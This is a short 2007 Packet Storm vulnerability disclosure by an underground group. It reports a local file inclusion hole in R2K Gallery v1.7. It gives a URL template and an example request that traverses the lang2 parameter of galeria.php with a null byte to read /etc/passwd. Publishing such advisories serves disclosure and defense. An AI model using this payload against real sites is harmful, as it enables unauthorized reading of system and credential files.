r2k-disclose.txt

2007-05-16T00:00:00
ID PACKETSTORM:56767
Type packetstorm
Reporter Dj7xpl
Modified 2007-05-16T00:00:00

Description

                                        
                                            ` \\\|///  
\\ - - //  
( @ @ )  
----oOOo--(_)-oOOo---------------------------------------------------  
  
[ Y! Underground Group ]  
[ Dj7xpl@yahoo.com ]  
[ Dj7xpl.2600.ir ]  
  
----ooooO-----Ooooo--------------------------------------------------  
( ) ( )  
\ ( ) /  
\_) (_/  
  
---------------------------------------------------------------------  
  
[!] Portal : R2K Gallery v1.7  
[!] Download : http://usuarios.lycos.es/r2kscripts/  
[!] Type : Local File Include Vuln  
  
---------------------------------------------------------------------  
  
---------------------------------------------------------------------  
  
Bug :  
  
http://[Target]/[Path]/galeria.php?pictures_folder=[Gallery Folder]&lang2=[Local File]  
  
Example :  
  
http://Target.ir/gallery/galeria.php?pictures_folder=./example/&lang2=../../../etc/passwd%00  
  
---------------------------------------------------------------------  
  
`